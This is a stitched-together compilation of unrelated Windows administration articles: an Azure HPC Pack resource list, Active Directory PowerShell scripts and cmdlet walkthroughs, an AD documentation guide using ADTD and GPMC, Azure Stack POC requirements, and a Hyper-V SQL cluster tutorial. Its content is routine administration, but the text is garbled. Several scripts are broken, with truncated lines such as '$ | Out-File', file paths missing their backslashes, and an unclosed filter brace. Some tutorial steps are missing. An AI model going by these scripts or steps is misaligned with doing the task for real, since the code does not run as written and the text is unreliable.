create and manage a high performance computing (HPC)

Options to create and manage a high performance computing (HPC) cluster in Azure with Microsoft HPC Pack

Azure has two different deployment models for creating and working with resources: Resource Manager and classic. This article covers using both models, but Microsoft recommends that most new deployments use the Resource Manager model.

Take advantage of Microsoft HPC Pack and Azure compute and infrastructure services to create and manage a cloud-based high performance computing (HPC) cluster. HPC Pack is Microsoft’s free HPC solution built on Microsoft Azure and Windows Server technologies and supports both Windows and Linux HPC workloads. A cloud-based HPC Pack cluster provides a cluster administrator or independent software vendor (ISV) a flexible, scalable platform to run compute-intensive applications while reducing investment in an on-premises compute cluster infrastructure.

Run an HPC Pack cluster in Azure VMs
Azure templates

(Marketplace) HPC Pack cluster for Windows workloads

(Marketplace) HPC Pack cluster for Excel workloads

(Marketplace) HPC Pack cluster for Linux workloads

(Quickstart) Create an HPC cluster

(Quickstart) Create an HPC cluster with Linux compute nodes

(Quickstart) Create an HPC cluster with custom compute node image

Azure VM images

HPC Pack on Windows Server 2012 R2

HPC Pack compute node on Windows Server 2012 R2

HPC Pack compute node with Excel on Windows Server 2012 R2

PowerShell deployment script

Create an HPC cluster with the HPC Pack IaaS deployment script

Tutorial: Get started with Linux compute nodes in an HPC Pack cluster in Azure

Tutorial: Run NAMD with Microsoft HPC Pack on Linux compute nodes in Azure

Tutorial: Run OpenFOAM with Microsoft HPC Pack on a Linux RDMA cluster in Azure

Tutorial: Get started with an HPC Pack cluster in Azure to run Excel and SOA workloads

Manual deployment with the Azure portal

Set up the head node of an HPC Pack cluster in an Azure VM
Cluster management

Manage compute nodes in an HPC Pack cluster in Azure

Grow and shrink Azure compute resources in an HPC Pack cluster

Submit jobs to an HPC Pack cluster in Azure

Add worker role nodes to an HPC Pack cluster
Burst to Azure worker instances with HPC Pack

Tutorial: Set up a hybrid cluster with HPC Pack in Azure

Add Azure “burst” nodes to an HPC Pack head node in Azure

Grow and shrink Azure compute resources in an HPC Pack cluster

Integrate with Azure Batch
Burst to Azure Batch with HPC Pack
Create RDMA clusters for MPI workloads
Set up a Windows RDMA cluster with HPC Pack to run MPI applications

Tutorial: Run OpenFOAM with Microsoft HPC Pack on a Linux RDMA cluster in Azure

Set up a Linux RDMA cluster to run MPI applications

List Group Members in Active Directory

List Group Members in Active Directory

This script can be used to list group membership in Active Directory.

This script can be used to list group membership in Active Directory.  As you can see on the following screenshot, this script uses an input file called Glist.csv which contains all group names.  You will see the output on the screen as well as in theGroupDetails.csv file.
This script can be used to list group membership in Active Directory 
$GFile = New-Item -type file -force "C:ScriptsGroupDetails.csv" 
Import-CSV "C:ScriptsGList.csv" | ForEach-Object { 
$GName = $_.GroupName 
$group = [ADSI] "LDAP://$GName" 
$ | Out-File $GFile -encoding ASCII -append 
    foreach ($member in $group.member) 
            $Uname = new-object directoryservices.directoryentry("LDAP://$member"
            $ | Out-File $GFile -encoding ASCII -append 



Working with Active Directory there are a number of powershell commands and scripts that you can use to manage Active Directory. I have put together a list of the top scripts that you can use to complete the most common tasks that i have come across supporting AD.

1.) Create Active Directory Users Based On Excel Input

This script will allow you to create users using data from an excel /CSV file. You can enter all the different attributes within the excel file of the data you want created on the users account during the creation (e.g department, manager, telephone number, etc).  It uses the New-ADUser powershell Cmdlet

2.) Active Directory Password Expiry Email Notification

This is a great script that will email your users when their password is due to expire. Help reduce those helpdesk calls to reset users passwords when their account gets locked out from expiration.  Simply run the script as a scheduled task and it will check AD for any accounts near expiration and send them an email to remind them

3.) Get Active Directory User Account Last Logged On Time

This is a useful script to find out when a user last logged onto a computer in the domain. You can also import users from CSV if you want to check a list of users.
Example 1: Type Get-OSCLastLogonTime -SamAccountName “lindawang”,”doris” command in the Windows PowerShell Console.
Example 2: Type Get-OSCLastLogonTime -CsvFilePath “C:SamAccountName.csv” command in the Windows PowerShell Console.
This command will list user’s last logon time info from your specified csv file.
Note: the CSV File format must follow the format below:

4.) Find Out What Computer Locked Users Account Get-LockedOutLocation

This script will query the PDC looking for event (4740) and find out which computer caused a users account to become locked out. The function will display the BadPasswordTime attribute on all of the domain controllers to add in further troubleshooting. Works with domain controllers running Windows Server 2008 SP2 and up.
    PS C:>Get-LockedOutLocation -Identity Joe.Bloggs 

5.) Active Directory Audit Report

This is a powershell script that will generate a report and gather information about your Active Directory environment and export the results as a html or pdf
The list of items that the audit report will generate are as follows:
Forest Level Audit Report
  • Forest Information
    • Forest Summary
      • Name/Functional Level
      • Domain/Site/DC/GC/Exchange/Lync/Pool counts
    • Forest Features
      • Tombstone Lifetime
      • Recycle Bin Enabled
      • Lync AD Container
    • Exchange Servers
      • Organization/Administrative Group/Name/Roles/Site
      • Serial/Product ID
    • Lync
      • Element (Server/Pool)
      • Type (Internal/Edge/Backend/Pool)
      • Name/FQDN
  • Site Information
    • Summary
      • Site Name/Location/Domains/DCs/Subnets
    • Details
      • Site Name/Options/ISTG/Links/Bridgeheads/Adjacencies
    • Subnets
      • Subnet/Site Name/Location
    • Site Connections
      • Enabled/Options/From/To
    • Site Links *new*
      • Name/Replication Interval/Sites
  • Domain Information
    • Domains
      • Name/NetBIOS/Functional Level/Forest Root/RIDs Issued/RIDs Remaining *new*
    • Domain Password Policies
      • Name/NetBIOS/Lockout Threshold/Pass History Length/Max Pass Age/Min Pass Age/Min Pass Length
    • Domain Controllers
      • Domain/Site/Name/OS/Time/IP/GC/FSMO Roles
    • Domain Trusts
      • Domain/Trusted Domain/Direction/Attributes/Trust Type/Created/Modified
    • Domain DFS Shares
      • Domain/Name/DN/Remote Server
    • Domain DFSR Shares *new*
      • Domain/Name/Content/Remote Servers
    • AD Integrated DNS Zones
    • Group Policy Object Information
Domain Level Audit Report
  • Account Statistics (count) 1
    • Total User Accounts
    • Enabled
    • Disabled
    • Locked
    • Password Does Not Expire
    • Password Must Change
  • Account Statistics (count) 2
    • Password Not Required
    • Dial-in Enabled
    • Control Access With NPS
    • Unconstrained Delegation
    • Not Trusted For Delegation
    • No Pre-Auth Required
  • Group Statistics
    • Total Groups
    • Built-in
    • Universal Security
    • Universal Distribution
    • Global Security
    • Global Distribution
    • Domain Local Security
    • Domain Local Distribution
  • Privileged Group Statistics
    • Default Priv Group Name
    • Current Group Name (if it were changed)
    • Member Count
  • Privileged Group Membership for the following groups
    • Enterprise Admins
    • Schema Admins
    • Domain Admins
    • Administrators
    • Cert Publishers
    • Account Operators
    • Server Operators
    • Backup Operators
    • Print Operators
  • Account information for the prior sections:
    • Logon ID
    • Name
    • Password Age (Days)
    • Last Logon Date
    • Password Does Not Expire
    • Password Reversable
    • Password Not Required
Screenshots of diagrams and reports which can be generated from the script

6.) Generate Excel report based on Active Directory user objects

This script will generate a report in excel and show details about user objects.  The report will generate the following:
  • Active / Inactive User Accounts
  • Accounts Locked Out
  • Accounts Disabled
  • Expired Passwords
  • Passwords older then set amount of days
  • Passwords set to never expire
  • Password not required flag set
  • And many more options
This can run against your domain or entire forest

7.) Get Inactive User in Domain based on Last Logon Time Stamp

A script to find inactive / old users in your domain and export the results to csv.  Simply put how many days you want to check since the last time a user logged in.
# Gets time stamps for all User in the domain that have NOT logged in since after specified date 
# Mod by Tilo 2014-04-01 

import-module activedirectory  
$domain = ""  
$DaysInactive = 90  
$time = (Get-Date).Adddays(-($DaysInactive)) 
# Get all AD User with lastLogonTimestamp less than our time and set to enable 
Get-ADUser -Filter {LastLogonTimeStamp -lt $time -and enabled -eq $true-Properties LastLogonTimeStamp | 
# Output Name and lastLogonTimestamp into CSV  
select-object Name,@{Name="Stamp"; Expression={[DateTime]::FromFileTime($_.lastLogonTimestamp).ToString('yyyy-MM-dd_hh:mm:ss')}} | export-csv OLD_User.csv -notypeinformation

8.) List Group Members in Active Directory

Run this script to find out a list of members in your groups in AD.  Simply add a list of groups you would like to check in a csv and run the script against this and will will export a list of members in your groups

Documenting Active Directory Infrastructure the Easy Way

Documenting Active Directory Infrastructure the Easy Way0

    Hi, Ned here. From time to time customers ask us what their options are to document their Active Directory environments – site topologies, domains and trusts, where group policies are linked and what their settings are. Until recently we didn’t have an easy way to do this and they were forced to invest a lot of manual labor in creating a map. Today we’ll talk about some free tools we can use to make this task very easy and accurate. I’m going to focus on the most common areas:
•    Domain and Forest information 
•    OU Structures 
•    Sites 
•    Exchange 
•    Group Policy settings and links
To do this we’re going to use two automation utilities that you will need to download and install:
For the ADTD you will also need Microsoft Office Visio 2003 or 2007 and .NET 2.0 Framework. If you’re using the GPMC that comes with Windows Vista you will need to download the GPMC scripts separately. For this example we’ll assume you’re on XP.
GPMC is a centralized management and reporting tool for administering group policy. It includes some very useful (and well-hidden) scripts. ADTD is a newly released tool that can interrogate domain controllers about configuration data and create Visio diagrams that document your environment. When combined using the techniques below, that extremely boring and time-consuming documentation project you had in front of you is only going to take hours instead of weeks, leaving you free for more important things.
So let’s get started:
1. Install Visio, ADTD, and GPMC on a Windows XP Professional workstation or Windows Server 2003 server.
2. Start ADTD (it’s called ‘Microsoft Active Directory Topology Diagrammer’ on the Start Menu)
3. Now we’ll walk through the settings tabs to configure our data collection:
Enter in a local (to you) Global Catalog Domain Controller that you can interrogate with the tool. The actual LDAP queries to the GC only take a few seconds in most cases and should not generate any appreciable load – most of the heavy lifting in ADTD is local to your client in Visio. Add your trust settings (if you have more than one domain or multiple forests with trusts). You can also count your users per domains and identify all your GC’s. Using the default of ‘Use DNS and connect to each domain’ means that the tool will also connect to one DC in any trusting domains as well, but again, the amount of data returned will tend to be fairly small.
On the OU’s tab you can select to draw out all your Organizational Units. Most of the time you’ll want to avoid limiting the depth since your diagram will be incomplete.
On the Sites tab you can specify that Site Links, Replication Connections, and subnets are drawn. Avoid using the ‘suppress empty sites’ setting as it’s useful to see locations using Automatic Site Coverage.
If you’re using Microsoft Exchange the Exchange tab can help diagram your Exchange Organization, where the connections are, the number of mailboxes per server, and even tie them to their logical AD sites so that you know which DC/GC combinations are servicing your messaging infrastructure.
If you’re using Windows Server 2003 domain or forest-based AD-integrated DNS, you can also opt to show which DC’s are hosting those partitions.
Finally, with ADTD you can get additional server information such as fully qualified domain names, operating systems and service pack, then color-code them for easier reading. This is especially useful in extremely large, complex environments where DC’s from many different domains are collocated in the same AD site within the same forest.
4. To execute your query, click Discover. After a few moments it will complete the LDAP lookups and will gray out. Click Draw, and go get a cup of coffee (or lunch, if you’re running hundreds of DC’s) – Visio will crank away creating all of the diagrams for some time. When it’s done, control will return to the ADTD application and you can close it.
So now we have some Visio diagrams that will be in your My Documents folder (by default; you can change this in ADTD’s options menu). In the example below we have:
  • A domain called with two DC’s and an Exchange server.
  • A child domain called with a single DC.
  • An externally-trusted domain called
  • An externally-trusted child domain called
So let’s look at what Visio gave us:
Above is the AD Domains.vsd. It shows our four domains and their trusts. Let’s zoom in on the FABRIKAM domain:
We have 45 total users on our two DC’s. All the FSMO role holders are identified, as well as the schema version and what domain functional mode we’re in. If we move on to the AD Sites.vsd:
We can see that my forest has two sites, has several subnets bound to them, and there are connections between the DC’s. Let’s zoom in on that Main-Office site:
Nifty – we can see the GC’s, the subnet details, the intra and inter-site connections, the Site Link costs and schedule, and even the DC running the ISTG. If you want more detail on all these components check out the highly detailed How Active Directory Replication Topology Works.
Moving on to the AD Application Partitions.vsd, we can see that only two root domain DC’s are using 2003-style integrated DNS:
Since we have an Exchange 2003 server in this environment, Ex Organization.vsd shows us that it has affinity with the Main-Office site.
By zooming in we can see that server 2003SRV12 is part of the ‘First Administrative Group’ and is running Exchange 2003 Service Pack 2. It has 32 mailboxes. Any DC/GC lookups it’s doing should be happening against the two DC’s in this site.
Finally for ADTD, we come to the OU diagram. The diagrammer can list out all the OU’s (below is a snippet), but other than telling us that that a Group Policy Object is linked to a given location, it doesn’t give much about the policies themselves.
So here’s where GPMC scripting kicks in:
1. We open a CMD prompt on our data gathering machine and (assuming we installed to default path) navigate to:
C:Program FilesGPMCScripts
2. We type:
MD c:GPMCReports
3. We execute (using our example domain):
Cscript ListSOMPolicyTree.wsf / > c:gpmcreportsfabrikamgpotree.txt
4. This returns us the c:gpmcreportsfabrikamgpotree.txt. If we open it we see:
=== GPO Links for domain ===
      GPO=Default Domain Policy 
   OU=Domain Controllers 
         GPO=Default Domain Controllers Policy 
            GPO=Logoff Screensaver 
                  GPO=Password Screensaver 
         GPO=No Boot
=== GPO Links for sites in forest DC=fabrikam,DC=com ===
5. We execute in our command prompt:
Cscript GetReportsForAllGPOs.wsf c:gpmcreports /
6. This returns all of our policy settings for to the c:gpmcreports folder:
== Found 6 GPOs in
Generating XML report for GPO ‘No Boot’ 
Generating HTML report for GPO ‘No Boot’
Generating XML report for GPO ‘Default Domain Policy’ 
Generating HTML report for GPO ‘Default Domain Policy’
Generating XML report for GPO ‘Logoff Screensaver’ 
Generating HTML report for GPO ‘Logoff Screensaver’
Generating XML report for GPO ‘Password Screensaver’ 
Generating HTML report for GPO ‘Password Screensaver’
Generating XML report for GPO ‘Default Domain Controllers Policy’ 
Generating HTML report for GPO ‘Default Domain Controllers Policy’
Generating XML report for GPO ‘AllCheck’ 
Generating HTML report for GPO ‘AllCheck’
Report generation succeeded for 12 reports. 
Report generation failed for 0 reports.
7. If we open one of these HTML reports, we can see everything there is to know about that policy. For example, we’ll open the ‘Password Screensaver’ GPO which is linked at OU ‘nested4’; there’s great stuff here…
Like settings detail above.
Or version history and status.
Or delegation.
Since all this is HTML and XML, you could simply link these live into your OU VSD’s, or get fancier and automate the importation of XML data (using Visio skills far better than mine!). Worst case you’re doing a little copying and pasting from the fabrikamgpotree.txt to update your GPO information instead of hand-crafting thousands objects and settings.
Now all you need is that $20,000 color plotter so you can print out your diagram wall-sized…

Before you deploy Azure Stack POC (Proof of Concept)

Before you deploy Azure Stack POC (Proof of Concept), make sure your computer meets the following requirements.

Operating system

OS Version Windows Server 2016 Datacenter Edition Technical Preview 4 with the latest updates installed, including KB 3124262.
Install Method Clean install. You can use the WindowsServer2016Datacenter.vhdx provided in the deployment package to quickly install the operating system on your Azure Stack POC machine. If you don’t use the WindowsServer2016Datacenter.vhdx, you must manually install the operating system, updates, and KB 3124262.
Domain joined? No.



One available port on a switch for the POC machine.  
The Azure Stack POC machine supports connecting to a switch access port or trunk port. No specialized features are required on the switch. If you are using a trunk port or if you need to configure a VLAN ID, you have to provide the VLAN ID as a deployment parameter. For example:
DeployAzureStack.ps1 verbose PublicVLan 305


Do not connect the POC machine to the subnets,, or These are reserved for the internal networks within the Microsoft Azure Stack POC environment.


Only IPv4 is supported. You cannot create IPv6 networks.


Make sure there is a DHCP server available on the network that the NIC connects to. If DHCP is not available, you must prepare an additional static IPv4 network besides the one used by host. You must provide that IP address and gateway as a deployment parameter. For example:
DeployAzureStack.ps1 -Verbose -NATVMStaticIP -NATVMStaticGateway

Internet access

Make sure the NIC can connect to the Internet. Both the host IP and the new IP assigned to the NATVM (by DHCP or static IP) must be able to access Internet. Ports 80 and 443 are used under the and domains.


If a proxy is required in your environment, specify the proxy server address and port as a deployment parameter. For example:
DeployAzureStack.ps1 -Verbose -ProxyServer
Azure Stack POC does not support proxy authentication. 


Port 443 (HTTPS) must be open for your network. The client end-point is

Microsoft Azure Active Directory accounts

To deploy Azure Stack POC, you must have a valid Microsoft Azure AD account that is the directory administrator for at least one Azure Active Directory. If you don’t have any existing Azure AD account, you can create one for free at (in China, visit instead.)
This Azure AD account is used as the service administrator account for the environment. The service administrator can configure and manage resource clouds, user accounts, tenant plans, quotas, and pricing. In the portal, they can create website clouds, virtual machine private clouds, create plans, and manage user subscriptions.
Save these credentials for use in step 6 of Run the PowerShell deployment script. This will be the day 0 administrator.
You should also create at least one account so you can sign in to the Azure Stack POC as a tenant. Or add users from other AD accounts into your tenant accounts. See Appendix A for instructions on how to add a user in Azure Active Directory.
The Azure Stack POC supports Azure Active Directory authentication only.
Azure Active Directory account  Supported?
Organization ID with valid Public Azure Subscription  Yes
Microsoft Account with valid Public Azure Subscription  Yes
Organization ID with valid China Azure Subscription  Yes
Organization ID with valid US Government Azure Subscription  No


These requirements apply to the Azure Stack POC only and might change for future releases.
Component Minimum Recommended
Compute: CPU Dual-Socket: 12 Physical Cores Dual-Socket: 16 Physical Cores
Compute: Memory 96 GB RAM 128 GB RAM
Compute: BIOS Hyper-V Enabled (with SLAT support) Hyper-V Enabled (with SLAT support)
Network: NIC Windows Server 2012 R2 Certification required for NIC; no specialized features required Windows Server 2012 R2 Certification required for NIC; no specialized features required
Disk drives: Operating System 1 OS disk with minimum of 200 GB available for system partition (SSD or HDD) 1 OS disk with minimum of 200 GB available for system partition (SSD or HDD)
Disk drives: General Azure Stack POC Data 4 disks. Each disk provides a minimum of 140 GB of capacity (SSD or HDD). 4 disks. Each disk provides a minimum of 250 GB of capacity.
HW logo certification Certified for Windows Server 2012 R2 Certified for Windows Server 2012 R2
Data disk drive configuration: All data drives must be of the same type (SAS or SATA) and capacity. If SAS disk drives are used, the disk drives must be attached via a single path (no MPIO, multi-path support is provided)
HBA configuration options: 1. (Preferred) Simple HBA 2. RAID HBA – Adapter must be configured in “pass through” mode 3. RAID HBA – Disks should be configured as Single-Disk, RAID-0
Supported bus and media type combinations
  • RAID SSD (If the media type is unspecified/unknown*)
* RAID controllers without pass-through capability can’t recognize the media type. Such controllers will mark both HDD and SSD as Unspecified. In that case, the SSD will be used as persistent storage instead of caching devices. Therefore, you can deploy the Microsoft Azure Stack POC on those SSDs.
Example HBAs: LSI 9207-8i, LSI-9300-8i, or LSI-9265-8i in pass-through mode
Sample OEM configurations are available.

Next steps

How to Install the Active Directory Module for Windows PowerShell

How to Install the Active Directory Module for Windows PowerShell

With the release of PowerShell 2.0, we now have a PowerShell module that we can use to administer Active Directory. The Active Directory Module for Windows PowerShell runs on Windows Server 2008 R2 and on Windows 7 and relies on a web service that is hosted on one or more domain controllers in your environment. In this post I’ll go over what you need in order to install and use the Active Directory Module for PowerShell, also known as AD PowerShell.

Setting up your Domain Controllers

In order to use the Active Directory Module for Windows PowerShell on 2008 R2 and Windows 7, you first need to be running Active Directory Web Services (ADWS) on at least one Domain Controller. To install Active Directory Web Services (ADWS) you’ll need one of the following:
1. Windows Server 2008 R2 AD DS
You can load Active Directory Web Services (ADWS) on a Windows Server 2008 R2 Domain Controller when you install the AD DS role. The AD PowerShell module will also be installed during this process. Active Directory Web Services (ADWS) will be enabled when you promote the server to a DC using DCPromo.
2. Active Directory Management Gateway Service
If you cannot run Windows Server 2008 R2 Domain Controllers, you can install the Active Directory Management Gateway Service. Installing this will allow you to run the same Active Directory web service that runs on Windows Server 2008 R2 DC’s. You can download the Active Directory Management Gateway Service here. Make sure you read the instructions carefully, there are several hotfixes that need to be applied depending on the version of Windows you are running. You can install the Active Directory Management Gateway Service on DC’s running the following operating systems:
  • Windows Server 2003 R2 with Service Pack 2
  • Windows Server 2003 SP2
  • Windows Server 2008
  • Windows Server 2008 SP2
Note: You can also use AD PowerShell to manage AD LDS instances on Windows Server 2008 R2. If you plan on using AD LDS, Active Directory web services will be installed with the AD LDS role, the AD PowerShell module will also be installed during this process. The ADWS service will be enabled when your LDS instance is created.
Once you’ve got Active Directory web services up and running on your Domain Controller(s), you’ll notice you now have an ADWS service as shown here:
At this point, you should be ready to install the AD PowerShell module. You can run AD PowerShell on all versions of Windows Server 2008 R2 (except the Web Edition) and on Windows 7.

Installing the Active Directory Module for Windows PowerShell on 2008 R2 member servers

You can install the Active Directory Module on Windows 2008 R2 member servers by adding the RSAT-AD-PowerShell feature using the Server Manager. I usually use the ServerManager module to do this because it is quick and easy. To install the feature using the ServerManager module, launch PowerShell and run the following commands:
Import-Module ServerManager
Add-WindowsFeature RSAT-AD-PowerShell
Remember, this only needs to be done on Windows Server 2008 R2 member servers. The RSAT-AD-PowerShell feature will be added to 2008 R2 DC’s during the DCPromo process.

Installing the Remote Server Administration Tools (RSAT) feature on Windows 7

In order to install the Active Directory Module for Windows PowerShell you need to download the RSAT tools for Windows 7 here. Once this is installed you are still not finished, you need to enable the Active Directory module. Navigate to Control Panel > Programs and Features > Turn Windows Features On or Off and select Active Directory Module for Windows PowerShell as show here:
Once you have Active Directory web services running on at least one domain controller and the AD PowerShell module is installed, you are ready to run the AD PowerShell module. You can do this in one of two ways. First, you can access the “Active Directory Module for Windows PowerShell” shortcut in Administrative Tools as shown here:
Right click the shortcut and select “Run as administrator” in order to start PowerShell with elevated permissions.
You can also simply import the AD PowerShell module in your existing PowerShell session. Just use the Import-Module ActiveDirectory command:
Import-Module ActiveDirectory
That’s all that needs to be done to get up and running…I will get into using the AD PowerShell cmldets in future posts so keep an eye out for that.

Related Posts

Creating an Active/Active SQL Cluster using Hyper-V: Part1 Virtualized Storage

Creating an Active/Active SQL Cluster using Hyper-V: Part1 Virtualized Storage

Creating an Active/Active SQL Cluster using Hyper-V: Part1 Virtualized Storage


10 Apr 2012 3:07 PM 


In this series of posts I will walk you through the processes of creating an Active/Active SQL server cluster using Hyper-V and Microsoft iSCSI target software for virtualized SAN. The target is to create first a storage server hosted on a normal Windows 2008 R2 server. Then connect to this server using two other machines as iSCSI initiators. Then I will create the windows cluster along with the DTC clustered service. A clustered SQL server instance will then be created. Finally another clustered SQL server instance will be created and Active/Active configuration of both instances will be applied.

Solution Architecture

The solution is fairly simple as per the below configuration.


You need to create three virtual machines as illustrated above. One as the AD and storage server and another two as the SQL server nodes that will act as Active/Active nodes.
These are all windows 2008 R2 servers and we have created the domain and joined all servers to this domain. You need also to setup two network cards in each machine to function as normal LAN connection and another one for the cluster heartbeat. It would be advisable also to separate the storage usage to another network if you have heavy usage. The configuration given here is all static with normal local IPs assigned on all network cards.

Virtualized SAN Steps

In this section we will go through the needed steps to create the virtual storage server based SAN.

Configuring the iSCSI Target

1-      Download the required iSCSI target software from
2-      Copy the software to the storage server UK-LIT-AD in this case.
3-      Double click the file to start the installation.
4-      After it completes it will take you to a web page clip_image003
5-      Scroll down and click as below clip_image004
8-      Click install clip_image007
10-   Now open server manager and you will find a new tree as below clip_image009
12-   Give the new target a name (Just any name) clip_image012
13-   In the initiator list just click advanced and enter all the domain names of the servers that will have access to this target. In our case this is UK-LIT-DB1 and UK-LIT-DB2. clip_image013 clip_image014
14-   If it displays a warning about the multiple initiators just accept it. clip_image015
15-   Click finish. And now you have completed the creation of your iSCSI target and what remains is to add the required virtual disks to it.
17-   Place the new VHD and give it a name. clip_image018
18-   Choose the disk size clip_image019
19-   Click finish and this would create the fixed size disk.
20-   You will need to create the following disks so just follow the same approach
Cluster Quorum
DTC cluster 1 log disk
DTC cluster 2 log disk
SQL cluster 1 shared disk
SQL cluster 2 shared disk

Configuring the iSCSI Initiators

Now we will configure the two SQL nodes to be able to access these disks.
1-      Log on to the first node UK-LIT-SQL1
2-      Open the iSCSI initiator clip_image020
3-      Change the initiator name to match the machine name clip_image021
4-      In the discovery tab add a new discovery portal using the IP of the storage server.
5-      Click on the targets tab and click refresh to show the available targets clip_image022
6-      Click connect then OK. clip_image023
7-      Go to the volumes and devices tab and click auto configure clip_image024
8-      Do the same steps on UK-LIT-SQL2 starting at step 1 above but change the initiator name to match the machine name as below clip_image026
9-      Go to any node of the two and open the server manager and then the disk management.
10-   Bring all disks online to this node and then prepare them with primary partitions and format those using NTFS.
In the next parts I will show you how to configure the Active/Active SQL cluster.

Creating an Active/Active SQL Cluster using Hyper-V: Part2 the Clustered Instances

Creating an Active/Active SQL Cluster using Hyper-V: Part2 the Clustered Instances

In part 1 of this series I showed you how to configure the virtual storage required for the cluster. In this part I will show you how to create the SQL cluster as an Active/Passive cluster and in the next part I will show how to convert it to an Active/Active cluster.


In this series of posts I will walk you through the processes of creating an Active/Active SQL server cluster using Hyper-V and Microsoft iSCSI target software for virtualized SAN. The target is to create first a storage server hosted on a normal Windows 2008 R2 server. Then connect to this server using two other machines as iSCSI initiators. Then I will create the windows cluster along with the DTC clustered service. A clustered SQL server instance will then be created. Finally another clustered SQL server instance will be created and Active/Active configuration of both instances will be applied.

Solution Architecture

The solution is fairly simple as per the below configuration.

Windows Cluster Configuration Steps

Now that we have configured the storage we can start the windows failover cluster configuration.
1-      Install the windows failover clustering feature to both nodes from the add feature wizard. clip_image004
2-      Bring all shared storage online to the current node.
3-      Open the cluster management console and click create cluster. Note that it would be preferable to disable all disks at this stage from the iSCSI target but the disk that will be used as the Quorum. clip_image006
4-      In the select servers page click browse and select the two nodes clip_image008
5-      Perform the cluster validation using the selection to run the cluster validation wizard clip_image012
6-      Select all tests clip_image014
7-      Review the validation and make sure there are no validation errors clip_image016
8-      Back to the create cluster wizard. Give the new cluster a name and an unused IP clip_image018
9-      The cluster is created and the first disk assigned to the first LUN is treated as the Quorum disk of the cluster clip_image020
10-   If you disabled all disks from the iSCSI target but the Quorum disk then you will need to add them as a new storage to the cluster once they are needed. It is advisable to add every disk you will use once you need it.
11-   Go and enable the first disk that will be used for the first cluster DTC. clip_image021
12-   In the cluster management add the new storage. clip_image023
13-   Go to the Services and applications node and click Configure a new service or application and select the DTC service and then click next. clip_image025
14-   You can change the resource name if you want but you have to give it an unused IP clip_image027
15-   Select the disk clip_image029
16-   Click finish to the confirmation screen clip_image031
17-   Now the windows cluster is prepared and ready for SQL server installation with an instance of DTC. clip_image033

SQL Server First Cluster Instance

1-      Go to the iSCSI target and create or add the shared disk to be used by the SQL cluster clip_image034
2-      Open the SQL server setup and click on new SQL server cluster clip_image036
3-      Go through the normal setup process clip_image038
5-      Enter the SQL cluster name and leave as the default instance (or name this instance if you require) clip_image042
Please note that if you are using any virtualization technology other than Hyper-V and installed the guest additions, then you will need to uninstall these additions and restart the servers or the above step will fail and report that it cannot validate the above settings.
13-   This completes the installation of the first SQL cluster on the first node clip_image060
14-   Logon to the second SQL node and start the SQL setup and choose to add a new node to a failover cluster clip_image062
19-   Now that completes setting up the second node for this SQL cluster clip_image072

SQL Server Second Cluster Instance

Now we will go through the installation of a second clustered SQL instance to be prepared as another active instance on the passive node later.
1-      Go to the iSCSI target and create or add another shared disk to be used by the second SQL cluster clip_image034[1]
2-      Go to one of the nodes and then open the iSCSI initiator and then click again on auto configure of the volumes and devices. clip_image073
3-      Now open the disk management utility and create the active partition on this disk and format it using NTFS.
4-      Open the windows cluster management and add this disk to the cluster. clip_image075
5-      Open the SQL server setup and click on new SQL server cluster clip_image076
6-      Go through the normal setup process clip_image077
8-      Enter the SQL cluster name and the instance name as BCInst clip_image080
Please note that if you are using any virtualization technology other than Hyper-V and installed the guest additions, then you will need to uninstall these additions and restart the servers or the above step will fail and report that it cannot validate the above settings.
10-   Choose the already added disk clip_image085
11-   Choose a unique IP for his cluster clip_image087
16-   This completes the installation of the second SQL cluster on the first node clip_image092
17-   Logon to the second SQL node and start the SQL setup and choose to add a new node to a failover cluster clip_image093
19-   Choose the new cluster BCInst clip_image095
22-   Now that completes setting up the second node for this SQL cluster clip_image098
In the next part I will show you how to configure the two created SQL instances in an Active/Active SQL configuration.

Essential PowerShell Cmdlets for Managing Active Directory

Essential PowerShell Cmdlets for Managing Active DirectoryActive Directory and PowerShell together offer the system administrator a powerful set of cmdlets to manage and to automate standard domain related tasks.
Every company from the smallest proprietorship to the largest enterprise has Windows servers that use Active Directory (AD). Active Directory domains are security domains used for user authentication, for permitting access to network resources, and for tracking various network resources through the integrated domain naming system (DNS) service.
PowerShell’s AD module allows you to query AD resources, add, remove, and change resources, and to work with user accounts, policies, and objects.
The setup used for this article is a Windows 7 Enterprise system with PowerShell 4.0 installed and a fully updated and a pair of patched Windows Server 2008 R2 domain controllers running a Windows 2008 R2 domain level. The two domain controllers are VMware virtual machines.
Domain Controllers:      SERVER1, SERVER2                                                           
Domain:      MW.LOCAL
Domain Level:     Windows 2008 R2
Standard PowerShell AD management takes place on a system that’s within the domain. That is to say, that if you manage an AD domain, you’ll need to do so from a system (workstation or server) that’s a member of the domain you want to manage. This is not a strict requirement, however, managing a domain outside of your “home” domain is a bit clumsy and can be confusing. Domain trust relationships make managing “foreign” domains easier. That said, you learn how to connect to “foreign” domains in this article out of necessity to do so in large enterprise environments.

Installing the Active Directory Module for PowerShell

Before attempting to install the Active Directory module, check to see if it’s already available to you by entering the following cmdlet:

PS C:> Get-Module –ListAvailable

    Figure 1: Obtaining a list of available modules.

As you can see, this system already has the AD module available for import. If the AD module isn’t listed, then you’ll have to install it via Control Panel->Add/Remove Programs->Turn Windowsfeatures on or off. The module should be listed under the Remote Server Administration Tools (RSAT) list. Select it, click OK, and allow the installation to proceed.

If you do not find the module listed, you’ll have to download the Windows Management Framework 4.0 at, or download the RSAT at here.

After installation and reboot, reopen PowerShell and import the Active Directory module.

PS C:> Import-Module ActiveDirectory

The only response you’ll see from the system is shown in Figure 2 below. This progress indicator shows that you are installing the Active Directory module. Once complete, you now have access to 76 Active Directory cmdlets; 22 are Get cmdlets.
    Figure 2: Loading the Active Directory module into PowerShell.

Exploring Your Active Directory Environment

PowerShell’s “Get” cmdlets are a safe bet for exploring your Active Directory setup. The “Get” cmdlets don’t change anything in AD, nor do they disrupt any workflows by locking records. These cmdlets are the equivalent of using the SELECT keyword in standard SQL, so don’t worry that they induce any significant stress on your AD database or domain controllers. You’ll find the complete list of AD cmdlets on Microsoft’s Windows Server site at

The first cmdlet to begin our exploration process is Get-ADDomain. Get-ADDomain provides you with a list of information about your domain that you’ll find valuable as you discover your domain and its resources. See Figure 3 below.

PS C:> Get-ADDomain

    Figure 3: Exploring AD domain information via Get-ADDomain.
As you can see in Figure 3, this simple cmdlet provides a wealth of detail including:
  • Infrastructure Master Server Name (SERVER1)
  • Domain Mode (Windows 2008 R2)
  • Domain SID
  • Domain Name (MW)
  • Domain NETBIOS Name (MW)
Querying AD for the existence of a particular user is a common practice and one that works perfectly at the command line. This query yields useful information about the user, if the user exists in AD.

PS C:> Get-ADUser khess

     Figure 4: Querying AD for the existence of a user (khess).

